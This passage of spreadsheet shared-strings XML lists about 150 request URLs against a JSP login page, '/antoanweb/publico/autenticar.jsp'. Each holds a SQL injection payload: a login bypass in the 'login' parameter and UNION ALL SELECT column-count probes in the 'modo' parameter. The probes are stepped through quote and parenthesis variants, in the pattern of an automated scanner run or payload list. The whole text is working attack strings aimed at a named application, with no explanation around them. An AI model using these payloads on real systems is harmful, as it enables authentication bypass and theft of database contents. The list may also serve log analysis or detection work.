    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull#and(9701=9701</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null#and(3553=3553</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null#and(4460=4460</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null#and(8647=8647</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null#and(2693=2693</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null#and(1362=1362</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null#and(1487=1487</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null#and(1122=1122</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null#and(7267=7267</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null#and(9977=9977</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull#and((9322=9322</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null#and((6051=6051</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null#and((9420=9420</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null#and((6190=6190</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null#and((9127=9127</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null#and((8014=8014</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null#and((574=574</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null#and((5089=5089</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null#and((1214=1214</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null#and((7067=7067</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull#and(((6828=6828</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null#and(((113=113</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null#and(((1665=1665</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null#and(((5926=5926</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null#and(((5484=5484</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null#and(((5905=5905</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null#and(((1526=1526</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null#and(((6073=6073</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null#and(((7724=7724</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null#and(((9685=9685</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull#and('vtyd'='vtyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null#and('vhbf'='vhbf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null#and('hxxw'='hxxw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null#and('wdcm'='wdcm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null#and('hdvj'='hdvj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null#and('dzga'='dzga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null#and('uklo'='uklo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null#and('xiqf'='xiqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null#and('abdf'='abdf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null#and('xted'='xted</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull#and(('mbcl'='mbcl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null#and(('qbwb'='qbwb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null#and(('lmlu'='lmlu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null#and(('qwtu'='qwtu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null#and(('ewcl'='ewcl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null#and(('hqii'='hqii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null#and(('bsoi'='bsoi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null#and(('zksi'='zksi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null#and(('zoav'='zoav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null#and(('koqq'='koqq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull#and((('yhfc'='yhfc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null#and((('iscf'='iscf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null#and((('hmgl'='hmgl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null#and((('qpgu'='qpgu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null#and((('nmgx'='nmgx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null#and((('bais'='bais</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null#and((('btes'='btes</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null#and((('jihj'='jihj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null#and((('xlrn'='xlrn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null#and((('ckrx'='ckrx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull#and'vjux'='vjux</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null#and'bkbh'='bkbh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null#and'ngzd'='ngzd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null#and'hxad'='hxad</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null#and'qcee'='qcee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null#and'jeyj'='jeyj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null#and'gbro'='gbro</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null#and'pnms'='pnms</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null#and'sygu'='sygu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null#and'czde'='czde</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull#and('qbat'like'qbat</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null#and('bduk'like'bduk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null#and('ocku'like'ocku</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null#and('qalf'like'qalf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null#and('uzeg'like'uzeg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null#and('jwql'like'jwql</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null#and('zdqo'like'zdqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null#and('hsii'like'hsii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null#and('wxif'like'wxif</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null#and('hjya'like'hjya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull#and(('xbln'like'xbln</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null#and(('nxdm'like'nxdm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null#and(('hxbx'like'hxbx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null#and(('ozaf'like'ozaf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null#and(('cbsc'like'cbsc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null#and(('ydie'like'ydie</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null#and(('kjsr'like'kjsr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null#and(('cwok'like'cwok</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null#and(('tolp'like'tolp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null#and(('duoa'like'duoa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull#and((('wvsa'like'wvsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null#and((('lwzq'like'lwzq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null#and((('fdda'like'fdda</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null#and((('dexg'like'dexg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null#and((('oubp'like'oubp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null#and((('iyxr'like'iyxr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null#and((('rzvj'like'rzvj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null#and((('rgqx'like'rgqx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null#and((('pwlb'like'pwlb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null#and((('qxrq'like'qxrq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull#and'banh'like'banh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null#and'ztec'like'ztec</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null#and'uxwt'like'uxwt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null#and'lgiz'like'lgiz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null#and'ukex'like'ukex</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null#and'grsw'like'grsw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null#and'dwqa'like'dwqa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null#and'ekew'like'ekew</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null#and'lxjz'like'lxjz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null#and'kwuf'like'kwuf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull#and("nuru"="nuru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null#and("lnri"="lnri</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null#and("dlfc"="dlfc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null#and("lkib"="lkib</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null#and("felm"="felm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null#and("stut"="stut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null#and("csml"="csml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null#and("oqhc"="oqhc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null#and("knde"="knde</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null#and("apbn"="apbn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull#and(("fhqs"="fhqs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null#and(("whtz"="whtz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null#and(("dnsd"="dnsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null#and(("lrdw"="lrdw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null#and(("aoaz"="aoaz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null#and(("vagc"="vagc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null#and(("kltc"="kltc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null#and(("ntwz"="ntwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null#and(("yxtp"="yxtp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null#and(("kjrc"="kjrc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull#and((("uqhp"="uqhp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null#and((("fdwx"="fdwx</t>
  </si>
  <si>
